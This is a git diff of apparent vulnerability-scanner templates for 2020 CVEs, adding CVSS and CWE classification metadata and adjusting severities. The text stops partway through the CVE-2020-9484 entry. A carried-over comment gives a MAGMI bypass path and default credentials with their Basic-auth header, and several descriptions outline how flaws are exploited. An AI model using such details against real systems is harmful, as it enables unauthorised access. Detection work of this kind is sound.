b/cves/2020/CVE-2020-4463.yaml @@ -14,6 +14,11 @@ info: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 tags: cve,cve2020,ibm,xxe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2020-4463 + cwe-id: CWE-611 requests: - method: POST diff --git a/cves/2020/CVE-2020-5284.yaml b/cves/2020/CVE-2020-5284.yaml index 90ae483682..97a56c996e 100644 --- a/cves/2020/CVE-2020-5284.yaml +++ b/cves/2020/CVE-2020-5284.yaml @@ -9,6 +9,11 @@ info: reference: https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2020-5284 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 6107fbb57a..160406214c 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -8,6 +8,11 @@ info: - https://cinzinga.com/CVE-2020-5307-5308/ severity: critical tags: cve,cve2020,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5307 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml index a103e34d12..4a7aa0348f 100644 --- a/cves/2020/CVE-2020-5405.yaml +++ b/cves/2020/CVE-2020-5405.yaml @@ -3,10 +3,15 @@ id: CVE-2020-5405 info: name: Spring Cloud Directory Traversal author: harshbothra_ - severity: high + severity: medium description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. reference: https://pivotal.io/security/cve-2020-5405 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-5405 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml index 773e721bae..d4f7de242d 100644 --- a/cves/2020/CVE-2020-5410.yaml +++ b/cves/2020/CVE-2020-5410.yaml @@ -7,6 +7,11 @@ info: description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. reference: https://tanzu.vmware.com/security/cve-2020-5410 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-5410 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5412.yaml b/cves/2020/CVE-2020-5412.yaml index a0b1eac7af..dad8fbb3f9 100644 --- a/cves/2020/CVE-2020-5412.yaml +++ b/cves/2020/CVE-2020-5412.yaml @@ -7,6 +7,11 @@ info: description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly. tags: cve,cve2020,ssrf,springcloud reference: https://tanzu.vmware.com/security/cve-2020-5412 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2020-5412 + cwe-id: CWE-610 requests: - method: GET diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index 513a3be8c5..23edf290ed 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml @@ -11,6 +11,11 @@ info: # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible # in the event that a CSRF is leveraged against an existing admin session for MAGMI. # At the time of this advisory, no patch exists for this issue. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-5776 + cwe-id: CWE-352 requests: - raw: diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml index 6dbfb02778..ad90884501 100644 --- a/cves/2020/CVE-2020-5777.yaml +++ b/cves/2020/CVE-2020-5777.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5777 info: name: Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23 author: dwisiswant0 - severity: high + severity: critical description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 tags: cve,cve2020,magmi,magento @@ -12,6 +12,11 @@ info: # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5777 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml index 08d43a9cd4..176b2b2136 100644 --- a/cves/2020/CVE-2020-5847.yaml +++ b/cves/2020/CVE-2020-5847.yaml @@ -2,10 +2,15 @@ id: CVE-2020-5847 info: name: UnRaid Remote Code Execution author: madrobot - severity: high + severity: critical description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5847 + cwe-id: CWE-94,CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index e55a8ef228..c8698e5e5f 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5902 info: name: F5 BIG-IP TMUI RCE author: madrobot,dwisiswant0,ringo - severity: high + severity: critical description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. reference: - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html @@ -18,6 +18,11 @@ info: - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ - https://www.kb.cert.org/vuls/id/290915 tags: cve,cve2020,bigip,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5902 + cwe-id: CWE-22,CWE-829 requests: - method: GET diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml index d36d906517..aa4f6887c5 100644 --- a/cves/2020/CVE-2020-6207.yaml +++ b/cves/2020/CVE-2020-6207.yaml @@ -14,6 +14,11 @@ info: - https://github.com/chipik/SAP_EEM_CVE-2020-6207 - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/ - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6207 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml index 46077c6fbd..d86e3db289 100644 --- a/cves/2020/CVE-2020-6287.yaml +++ b/cves/2020/CVE-2020-6287.yaml @@ -12,6 +12,11 @@ info: - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - https://github.com/chipik/SAP_RECON + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-6287 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index a0bb988cd8..7ff8dd8f94 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://github.com/InitRoot/CVE-2020-6308-PoC tags: cve,cve2020,sap,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-6308 + cwe-id: CWE-918 + description: "SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability." requests: - method: POST diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index 4c27c186ac..572f55b729 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -3,12 +3,17 @@ id: CVE-2020-6637 info: name: OpenSIS v7.3 unauthenticated SQL injection author: pikpikcu - severity: high + severity: critical description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. tags: cve,cve2020,sqli,opensis reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://cinzinga.com/CVE-2020-6637/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6637 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index d08e8d811a..ddd44f6016 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -12,6 +12,10 @@ info: - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7209 requests: - method: GET diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f040fb2e36..f570b6ab86 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -5,6 +5,12 @@ info: severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 tags: cve,cve2020,smtp,opensmtpd,network,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7247 + cwe-id: CWE-78,CWE-755 + description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." network: - inputs: diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml index 0d6ceac8da..7f5f53afc6 100644 --- a/cves/2020/CVE-2020-7318.yaml +++ b/cves/2020/CVE-2020-7318.yaml @@ -13,6 +13,11 @@ info: reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2020-7318 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 1ca340cabb..3c7e70486f 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -8,6 +8,11 @@ info: reference: - https://www.adminxe.com/2183.html tags: cve,cve2020,zimbra,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7796 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 9f314f0f40..dd62e8fa68 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -10,6 +10,11 @@ info: - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7961 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-8091.yaml b/cves/2020/CVE-2020-8091.yaml index 0e62f1aae1..96ccd5bd0a 100644 --- a/cves/2020/CVE-2020-8091.yaml +++ b/cves/2020/CVE-2020-8091.yaml @@ -9,6 +9,11 @@ info: reference: - https://typo3.org/security/advisory/typo3-psa-2019-003/ - https://www.purplemet.com/blog/typo3-xss-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8091 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml index f12449e30e..f38b0a3567 100644 --- a/cves/2020/CVE-2020-8115.yaml +++ b/cves/2020/CVE-2020-8115.yaml @@ -10,6 +10,11 @@ info: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8115 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml index 396f4c1b06..b638675ca1 100644 --- a/cves/2020/CVE-2020-8163.yaml +++ b/cves/2020/CVE-2020-8163.yaml @@ -7,6 +7,11 @@ info: description: Tests for ability to pass user parameters as local variables into partials reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ tags: cve,cve2020,rails,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8163 + cwe-id: CWE-94 requests: - method: GET diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 653c89b7d0..850e1e43ea 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8191 info: name: Citrix ADC & NetScaler Gateway Reflected XSS author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix,xss reference: https://support.citrix.com/article/CTX276688 description: | Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8191 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index b63ac93a82..286402bddc 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml @@ -3,12 +3,17 @@ id: CVE-2020-8193 info: name: Citrix unauthenticated LFI author: pdteam - severity: high + severity: medium reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8193 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml index 1c08f85a0f..70af4732d1 100644 --- a/cves/2020/CVE-2020-8194.yaml +++ b/cves/2020/CVE-2020-8194.yaml @@ -3,10 +3,15 @@ id: CVE-2020-8194 info: name: Citrix ADC & NetScaler Gateway Reflected Code Injection author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. reference: https://support.citrix.com/article/CTX276688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml index 6b7489c55f..6b809abb63 100644 --- a/cves/2020/CVE-2020-8209.yaml +++ b/cves/2020/CVE-2020-8209.yaml @@ -12,6 +12,11 @@ info: reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8209 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml index d63d614467..8db1c6dddd 100644 --- a/cves/2020/CVE-2020-8512.yaml +++ b/cves/2020/CVE-2020-8512.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47988 - https://twitter.com/sagaryadav8742/status/1275170967527006208 tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8512 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index da3aec26dd..05ec699777 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -9,6 +9,11 @@ info: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8515 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml index 5cf989eb97..6a244c4df1 100644 --- a/cves/2020/CVE-2020-8771.yaml +++ b/cves/2020/CVE-2020-8771.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8771 + cwe-id: CWE-287 + description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts." requests: - raw: diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 0a036e89a5..988906da9e 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8813 info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 - severity: critical + severity: high description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8813 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml index 74819b7066..34b82f700e 100644 --- a/cves/2020/CVE-2020-8982.yaml +++ b/cves/2020/CVE-2020-8982.yaml @@ -7,6 +7,11 @@ info: description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020. tags: cve,cve2020,citrix,lfi reference: https://support.citrix.com/article/CTX269106 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8982 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml index 1f7d2d46bb..e19606cf3b 100644 --- a/cves/2020/CVE-2020-9036.yaml +++ b/cves/2020/CVE-2020-9036.yaml @@ -8,6 +8,12 @@ info: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9036 + cwe-id: CWE-79 + description: "Jeedom through 4.0.38 allows XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml index b7e04c9990..29d78f3858 100644 --- a/cves/2020/CVE-2020-9047.yaml +++ b/cves/2020/CVE-2020-9047.yaml @@ -21,6 +21,11 @@ info: - https://www.johnsoncontrols.com/cyber-solutions/security-advisories - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01 tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-9047 + cwe-id: CWE-347 requests: - method: GET diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index ff2a299a2b..e7fb124544 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml @@ -19,6 +19,11 @@ info: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-9054 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml index f244463bf9..14eed4ccd2 100644 --- a/cves/2020/CVE-2020-9315.yaml +++ b/cves/2020/CVE-2020-9315.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://www.cvebase.com/cve/2020/9315 tags: cve,cve2020,oracle + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9315 + cwe-id: CWE-306 + description: "** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE." requests: - method: GET diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml index c36d080c80..760e443f9a 100644 --- a/cves/2020/CVE-2020-9344.yaml +++ b/cves/2020/CVE-2020-9344.yaml @@ -10,6 +10,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344 - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9344 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml index 66b1211b6b..a8e7f8c014 100644 --- a/cves/2020/CVE-2020-9376.yaml +++ b/cves/2020/CVE-2020-9376.yaml @@ -13,6 +13,11 @@ info: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182 - https://www.dlink.com.br/produto/dir-610/ tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9376 + cwe-id: CWE-74 requests: - method: POST path: diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index c9f38d9a42..172130f2c4 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml @@ -10,6 +10,11 @@ info: author: geeknik severity: high tags: cve,cve2020,django,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-9402 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index 2336c16344..239b63a125 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml @@ -8,6 +8,11 @@ info: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 tags: cve,cve2020,rconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9425 + cwe-id: CWE-670 requests: - method: GET diff --git a/cves/2020/CVE-2020-9483.yaml b/cves/2020/CVE-2020-9483.yaml index e0017d5eda..ef8f233909 100644 --- a/cves/2020/CVE-2020-9483.yaml +++ b/cves/2020/CVE-2020-9483.yaml @@ -8,6 +8,11 @@ info: When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. reference: https://github.com/apache/skywalking/pull/4639 tags: cve,cve2020,sqli,skywalking + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9483 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml index 4765190c8e..95f1a4eec0 100644 --- a/cves/2020/CVE-2020-9484.yaml +++ b/cves/2020/CVE-2020-9484.yaml @@ -14,6 +14,11 @@ info: tags: 